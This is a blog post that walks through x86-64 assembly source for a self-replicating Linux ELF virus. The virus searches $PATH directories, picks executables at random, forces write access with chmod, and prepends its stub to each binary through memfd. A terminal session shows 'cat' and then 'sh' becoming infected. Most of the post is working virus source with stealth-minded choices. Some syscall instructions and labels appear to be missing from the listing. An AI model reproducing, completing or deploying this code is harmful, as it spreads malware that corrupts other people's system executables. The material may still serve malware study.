
In the previous blog post, I demonstrated a method of infecting ELF files. In this post, I would like to present a slightly improved version with additional features. The previous version of the infection code could only infect a single file, while the new version will be able to find potential host files and infect them automatically.

A good source of potential victim files is the $PATH environment variable, which contains a list of directories that may contain executable files. The program will search these directories for ELF files and infect them. The program will also check if the file is already infected to prevent infecting the same file multiple times. In addition, the program will ensure that it only attempts to infect ELF files that it has access to.

To begin, I will embed a marker in the stub to make it easily recognizable and add safety guards in case execve fails. I will pass the argp argument in rdi to the payload function so that it can use the $PATH to find potential victim files.

format ELF64 executable

; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ 1486

; XXX: You have to set this to the position of the "palaiologos" string
; in the binary yourself.

sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_close equ 3
sys_exit equ 60
sys_getdents equ 78
sys_access equ 21
sys_stat equ 4
sys_chmod equ 90

entry _start

sentinel: db 'palaiologos',0
memfd_path: db '/proc/self/fd/',0,0
self: db '/proc/self/exe'
empty: db 0
size: dq SIZE

    ; Open ourselves.
    xor esi, esi
    mov edi, self
    push sys_open
    pop rax
    ; Obtain the length: seek to back.
    mov r8, rax
    mov rdi, r8
    push sys_lseek
    pop rax
    ; Call memfd_create, call with MFD_CLOEXEC.
    mov edi, empty
    push 1
    pop rsi
    push sys_memfd_create
    pop rax
    ; Copy the file contents to the memfd using sendfile.
    mov edx, size
    mov r9, rax
    mov rdi, rax
    mov rsi, r8
    sub r10d, SIZE
    push sys_sendfile
    pop rax
    ; Close the file descriptor we hold to our own binary.
    push sys_close
    pop rax
    mov rdi, r8
    ; Bravely assume that the memfd descriptor number is a single digit.
    ; This might or might not work all of the times, but improving upon
    ; this is trivially beyond the scope of this post.
    add r9d, 48
    mov BYTE [memfd_path + 14], r9b

; The entry point.
    ; Load the argp for the payload.
    mov rdi, [rsp]
    lea rdi, [rsp+8 + rdi*8 + 8]
    call payload
    ; Load the executable to a memfd.
    call load_elf
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
    ; Load argc + argv
    lea rsi, [rsp + 8]
    ; Load argp
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]
    ; Perform the syscall
    push sys_execve
    pop rax
    ; Exit in case execve returns due to error.
    mov rdi, -1
    push sys_exit
    pop rax

For the purposes of the new payload, I will need a random number generator (to determine whether to infect a file or not), a constant variable with the path separator (to append it between the directory name and the file name), and two auxiliary LCG random number generator variables.

seed: dq 0
pathsep: db "/", 0

LCG_A equ 1103515245
LCG_B equ 12345

Stalking for prey

The payload will be handling large amounts of stack data, so it must reserve sufficient space to ensure that argc, argv, or argp are not overwritten during the process. This is also an opportune time to initialize the random number generator.

; Wants to be called with argp in rdi.
    ; Reserve a (somewhat arbitrary) amount of stack space.
    ; It needs to hold a few path buffers (3 buffers, 4096 bytes each)
    sub rsp, 12456
    ; Query the current time stamp counter as a source of randomness.
    ; rdtsc will set rdx and rax to the higher and lower bits of the time
    ; stamp counter, so we put them together and store them in the RNG seed
    ; variable.
    shl rdx, 32
    or rdx, rax
    mov qword [seed], rdx

The next part is more involved, as the code must locate the $PATH variable in the environment key/value pair table. A simple solution is to iterate until the current envp entry is NULL and check the prefix of the current entry. If it is PATH=, discard the first 5 bytes (to skip the key name in the string) and save it to a register. This part is relatively straightforward, but it is essential to guard against environment key/value pairs that are shorter than 5 bytes in total to prevent a potential buffer overflow.

    ; Find "PATH=" in ARGP.
    ; NULL terminates argp, check for this.
    mov rax, qword [rdi]
    test rax, rax
    je .infect_done
    ; Load the first five bytes of the current string.
    ; If any of them is NUL, we skip to the next string.
    mov cl, byte [rax]
    test cl, cl
    je .path_loop_skip
    mov dl, byte [rax + 1]
    test dl, dl
    je .path_loop_skip
    mov bl, byte [rax + 2]
    test bl, bl
    je .path_loop_skip
    mov sil, byte [rax + 3]
    test sil, sil
    je .path_loop_skip
    mov r8b, byte [rax + 4]
    test r8b, r8b
    je .path_loop_skip
    ; Check if the ASCII values are right.
    cmp cl, 'P'
    jne .path_loop_skip
    cmp dl, 'A'
    jne .path_loop_skip
    cmp bl, 'T'
    jne .path_loop_skip
    cmp sil, 'H'
    jne .path_loop_skip
    cmp r8b, '='
    je .path_found
    ; Go to the next pointer in the argp array.
    add rdi, 8
    jmp .path_find_loop
    add rax, 5

Determine a buffer that will hold the final path to the file that will be infected. As I wrote this program and golfed it in advance, I will also load two constants that might appear to be arbitrary (a syscall number and a divider for the probability of infecting a directory).

    ; Select the final path buffer.
    lea r12, [rsp + 4256]
    ; Load two auxiliary constants.
    push 3
    pop rbx
    push sys_open
    pop r8

At this point, the program can now loop through the entries in the PATH variable and examine each of them. The loop will continue until it encounters a NULL value (indicating that the PATH string has been exhausted), and then copies the current path (that is, the string from the current position in the PATH variable until the first occurrence of a colon or a NUL terminator, whichever comes first).

    ; Check if we've hit the end of the PATH variable.
    mov cl, byte [rax]
    test cl, cl
    je .infect_done
    ; Copy path until : or \0 is found.
    xor r13d, r13d
    test cl, cl
    je .attempt_scan
    cmp cl, ':'
    je .attempt_scan
    mov byte [rsp + r13 + 160], cl
    mov cl, byte [rax + r13 + 1]
    inc r13
    jmp .copy_path

There are a few more things to be done with the path. Firstly, it must be null-terminated. Secondly, if the final character in the PATH string is a colon, it must be skipped.

    ; NUL-terminate the path.
    mov ecx, r13d
    mov byte [rsp + rcx + 160], 0
    xor ecx, ecx
    ; Check if we have to skip an extra colon.
    cmp byte [rax + r13], ':'
    sete cl
    add rcx, rax
    ; Decide whether we want to infect this directory.
    ; Take a random number from a linear congruential generator
    ; and divide it by three. The modulus of zero means "no".
    imul rax, qword [seed], LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    xor edx, edx
    div rbx
    test rdx, rdx
    je .next_path

After obtaining a valid directory path, the program should now open it. It is crucial to verify the return code, as PATH entries do not have to be valid (they may not point to an existing directory). If the directory is invalid, it must be skipped.

    mov esi, 0x10000
    lea rdi, [rsp + 160]
    mov rax, r8
    ; Preserve rcx through the system call.
    mov qword [rsp], rcx
    mov rcx, qword [rsp]
    ; Clever way to determine whether the number is negative.
    bt eax, 31
    jb .next_path
    ; Save the file descriptor.
    mov qword [rsp + 8], rax
    ; Copy the file descriptor elsewhere, because we are going to use
    ; it now, and it would be a shame if a syscall clobbered it ;).
    mov rbp, rax

The program will use the fairly low-level system call getdents to obtain directory entries in batches. Before proceeding, some entries should be randomly pruned to reduce the number of filesystem operations performed (which helps to remain undetected).

    ; Load max path size.
    mov edx, 4096
    ; Load the directory file descriptor.
    mov rdi, rbp
    ; Load the buffer address.
    lea rsi, [rsp + 8352]
    push sys_getdents
    pop rax
    ; Jump to some common error stub that will close the
    ; directory descriptor in case of failure.
    test eax, eax
    je .getdents_err
    ; Preserve the amount of entries somewhere.
    ; eax is often trashed by system calls so we want to
    ; avoid it being lost.
    mov r14d, eax
    xor eax, eax
    ; Load the current entry number, directory entries buffer
    ; and the random seed.
    mov r15d, eax
    lea rbx, [rsp + r15]
    add rbx, 8352
    mov rax, qword [seed]
    ; Done processing?
    cmp r14, r15
    jbe .getdents_loop
    ; Extract the type of the directory entry.
    movzx ecx, word [rbx + 16]
    mov dl, byte [rbx + rcx - 1]
    ; Skip if not a regular file. We will not infect symlinks.
    cmp dl, 8
    jne .give_up
    ; Invoke the LCG again. Skip the entry upfront if dividing by
    ; four gives modulus 0, that is, last two binary digits of the
    ; number are 0.
    imul rax, rax, LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    test al, 3
    je .discard_loop

With the file name, it is possible to construct the final buffer with the absolute path to be infected, taking care to address some quirks in the process.

    ; OK, first nul-terminate the final buffer with the filename
    ; so that the `concat` function can work properly. Then append the
    ; directory name to that empty final buffer.
    mov byte [rsp + 4256], 0
    mov rdi, r12
    lea rsi, [rsp + 160]
    call concat
    ; We need to terminate the path with a slash only if it is not present
    ; already. Check this. Use a dumb strlen-ish function.
    mov rax, r12
    cmp byte [rax], 0
    je .len_ok
    inc rax
    jmp .len_loop
    ; Slash?
    cmp byte [rax - 1], '/'
    je .has_slash
    mov esi, pathsep
    mov rdi, r12
    call concat
    ; Append the file name now.
    lea rsi, [rbx + 18]
    mov rdi, r12
    call concat

At this point, the program should check if the file is actually accessible for writing and devise a plan for what to do when it is not. The approach here is to try to temporarily alter the permissions of the file in the hope that it grants the necessary write access. If it does not, the file must be skipped. If it does, the program will restore the original permissions later.

    ; Check if we can access the file for reading and writing.
    mov rdi, r12
    push 6 ; R_OK | W_OK
    pop rsi
    push sys_access
    pop rax
    mov rcx, rax
    ; Decide whether we want to infect this file anyway.
    ; Same LCG and division stuff, except this time with the
    ; modulus of 10.
    imul rax, qword [seed], LCG_A
    add rax, LCG_B
    mov qword [seed], rax
    xor edx, edx
    push 10
    pop rsi
    div rsi
    ; Proceed only if:
    ; (1) the file is not accessible
    ; (2) we want to infect it
    ; Handle a special case here: try to add an owner
    ; write permission bit to the file and see if this lets
    ; us access it... :). Might protect against some
    ; "overzealous" (removes write permissions on critical
    ; executables to avoid problems) but not "overly paranoid"
    ; (removes write permissions /and/ transfers ownership) users.
    ; In that case we can do nothing but hope that we get root somehow.
    test ecx, ecx
    je .normal_path
    test rdx, rdx
    jne .normal_path
    ; Stat the file.
    mov rdi, r12
    lea rsi, [rsp + 16]
    push sys_stat
    pop rax
    ; Set the owner write permission bit and call chmod.
    mov esi, dword [rsp + 40]
    or rsi, 128
    mov dword [rsp + 40], esi
    mov rbp, r12
    push sys_chmod
    pop r12
    mov rax, r12
    ; Try to access again?
    mov rdi, rbp
    push 6 ; R_OK | W_OK again.
    pop rsi
    push sys_access
    pop rax
    ; Still no? Restore the permissions.
    test eax, eax
    jne .restore_perms
    ; Yes => do infect.
    mov rdi, rbp
    call infect
    mov esi, dword [rsp + 40]
    and esi, -129 ; Everything except the bit 7
    mov dword [rsp + 40], esi
    mov rdi, rbp
    mov rax, r12
    ; File still not accessible. Give up.
    ; Load the directory descriptor.
    mov rax, qword [rsp + 8]
    mov r12, rbp
    mov rbp, rax
    jmp .give_up

If no difficulties were encountered, the file can be infected now with no extra alterations.

    ; Check if we want to infect this file.
    test rdx, rdx
    jne .give_up
    ; Do infect.
    mov rdi, r12
    call infect

Finally, a few fallback labels from the code defined above need to be implemented.

    ; We end up here when it's time to skip to
    ; the next directory entry.
    movzx ecx, word [rbx + 16]
    movzx eax, cx
    add eax, r15d
    jmp .dir_loop
    ; We get here when it's time to close the
    ; directory descriptor and move on.
    mov rdi, rbp
    push sys_close
    pop rbx
    mov rax, rbx
    ; Load the sys_open constant again
    push sys_open
    pop r8
    mov rcx, qword [rsp]
    ; Go to the next path to process
    add rcx, r13
    mov rax, rcx
    jmp .path_loop
    ; Balance the stack and yield.
    add rsp, 12456

The payload employs a concat procedure to join two nul-terminated strings. The implementation is relatively straightforward and is as follows:

    ; Find the end of the first string.
    cmp byte [rdi], 0
    lea rdi, [rdi + 1]
    jne concat
    ; Start appending characters in a loop.
    push -1
    pop rax
    ; Nothing left in the source string.
    mov cl, byte [rsi + rax + 1]
    test cl, cl
    je .done
    mov byte [rdi + rax], cl
    inc rax
    jmp .do_loop
    ; Null-terminate the string.
    mov byte [rdi + rax], 0

An improved infection function

The improved infection function will have several qualities that make it superior to the previous version. Most notably, the new infection function includes improved ELF file detection and better protection against re-infection. The process begins by opening the target file and reading and verifying the ELF header.

    ; Preserve a bunch of registers that the caller function needs.
    push r15
    push r14
    push rbx
    ; Reserve enough space for the transaction buffer.
    sub rsp, 200 + SIZE
    ; Open the goat file w/ O_RDWR.
    mov rbx, sys_open
    mov rsi, rbx
    mov rax, rbx
    ; Check if the file was opened successfully.
    bt eax, 31
    jb .cleanup
    ; Read the ELF header.
    mov r8d, eax
    lea rsi, [rsp - 112]
    ; Size of the ELF header.
    mov rdx, 64
    mov rdi, r8
    ; sys_read = 0
    xor eax, eax
    ; Check machine type (AMD64, code 62)
    cmp word [rsi + 18], 62
    jne .elf_bad
    ; ELF class (64-bit)
    cmp byte [rsp - 108], 2
    jne .elf_bad
    ; Check the 0x7f ELF magic.
    cmp byte [rsp - 109], 'F'
    jne .elf_bad
    cmp byte [rsp - 110], 'L'
    jne .elf_bad
    cmp byte [rsp - 111], 'E'
    jne .elf_bad
    cmp byte [rsp - 112], 0x7F
    jne .elf_bad

The function will check for the sentinel to determine if the file has already been infected. If the sentinel is present, the infection process should be terminated.

    ; Rewind to the SENTINEL_LOC-th byte. We want to check
    ; if this ELF file was already infected.
    mov r9, sys_lseek
    mov rsi, SENTINEL_LOC
    mov rdi, r8
    xor edx, edx
    mov rax, r9
    ; Read 12 bytes (length of "palaiologos\0")
    lea rsi, [rsp - 128]
    mov rdx, 12
    xor eax, eax
    ; Check if the sentinel is present.
    movq xmm0, qword [rsi]
    movq rax, xmm0
    ; Check the first part.
    mov rcx, 'palaiolo'
    cmp rax, rcx
    jne .elf_clean
    ; Check the remaining bytes: gos\0
    cmp byte [rsp - 120], 'g'
    jne .elf_clean
    cmp byte [rsp - 119], 'o'
    jne .elf_clean
    cmp byte [rsp - 118], 's'
    jne .elf_clean
    cmp byte [rsp - 117], 0
    jne .elf_clean
    ; Close ourselves and return. Already infected.
    mov rax, 3
    mov rdi, r8
    jmp .cleanup

The infection process is not much different from the previous iteration: the code will open the current executable, create a memory-backed file descriptor, and write the infectious stub to it followed by the target file.

    ; Open self.
    mov edi, self
    xor esi, esi
    mov rax, rbx
    ; Open a memfd with O_CLOEXEC.
    mov r10d, eax
    mov r14, 1
    mov edi, empty
    mov eax, sys_memfd_create
    mov rsi, r14
    ; Copy over the viral stub from ourselves to the memfd.
    mov ebx, eax
    lea r15, [rsp - 48]
    mov edx, SIZE
    mov rdi, r10
    mov rsi, r15
    xor eax, eax
    mov edx, SIZE
    mov rdi, rbx
    mov rax, r14
    ; Seek to the beginning of the goat file (we want the ELf header back).
    mov rdi, r8
    xor esi, esi
    xor edx, edx
    mov rax, r9
    ; Copy data from the goat file to the memfd in a loop.
    mov edx, SIZE
    mov rdi, r8
    mov rsi, r15
    xor eax, eax
    test eax, eax
    je .copy_goat_memfd_done
    mov edx, eax
    mov rdi, rbx
    mov rsi, r15
    mov rax, r14
    jmp .copy_goat_memfd

After constructing a valid parasitic ELF file, the final step is to rewind both files to the first byte and copy the contents of the memory-backed file descriptor to the target file. An improvement that could be made here is to check whether there is sufficient disk space to append the stub, but this scenario is extremely unlikely to pose an issue, so it is not worth the effort. It could, however, be implemented using ftruncate followed by appropriate error checking.

    ; Rewind the goat file and the memfd.
    mov rdi, rbx
    xor esi, esi
    xor edx, edx
    mov rax, r9
    mov rdi, r8
    xor esi, esi
    xor edx, edx
    mov rax, r9
    ; Overwrite the goat file with the memfd contents.
    lea rsi, [rsp - 48]
    mov edx, SIZE
    mov rdi, rbx
    xor eax, eax
    test eax, eax
    je .copy_memfd_goat_done
    mov edx, eax
    mov rdi, r8
    mov rax, r14
    jmp .copy_memfd_goat
    ; Close goat, memfd, and self.
    mov rdx, sys_close
    mov rdi, rbx
    mov rax, rdx
    mov rdi, r8
    mov rax, rdx
    mov rdi, r10
    mov rax, rdx
    ; Balance the stack and quit.
    add rsp, 200 + SIZE
    pop rbx
    pop r14
    pop r15


The new, improved ELF file infector is undoubtedly better than the original, however it still lacks a genuine payload, stealthiness, or code compression. I will discuss these topics in the next essay in the series, please stay tuned!

The following terminal session demonstrates the program’s capabilities. I have artificially created an environment with a single-directory $PATH variable that contains two common UNIX programs. I have linked the date program to the infector to reduce the amount of text output compared to the previous example using unzip.

~ % echo $PATH
~ % ls -la jail
total 192
drwxr-xr-x 2 palaiologos palaiologos   4096 Jan  4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos  20480 Jan  4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos  44016 Jan  5 00:37 cat
-rwxr-xr-x 1 palaiologos palaiologos 125640 Jan  5 00:37 sh
~ % ./stub && ls -la jail
Thu Jan  5 12:45:33 AM CET 2023
total 196
drwxr-xr-x 2 palaiologos palaiologos   4096 Jan  4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos  20480 Jan  4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos  45450 Jan  5 00:45 cat
-rwxr-xr-x 1 palaiologos palaiologos 125640 Jan  5 00:37 sh
~ % # cat was infected! if we run it now, the shell should also get infected.
~ % ./jail/cat /dev/null && ls -la jail
total 196
drwxr-xr-x 2 palaiologos palaiologos   4096 Jan  4 21:59 .
drwxr-xr-x 9 palaiologos palaiologos  20480 Jan  4 19:51 ..
-rwxr-xr-x 1 palaiologos palaiologos  45450 Jan  5 00:45 cat
-rwxr-xr-x 1 palaiologos palaiologos 127074 Jan  5 00:37 sh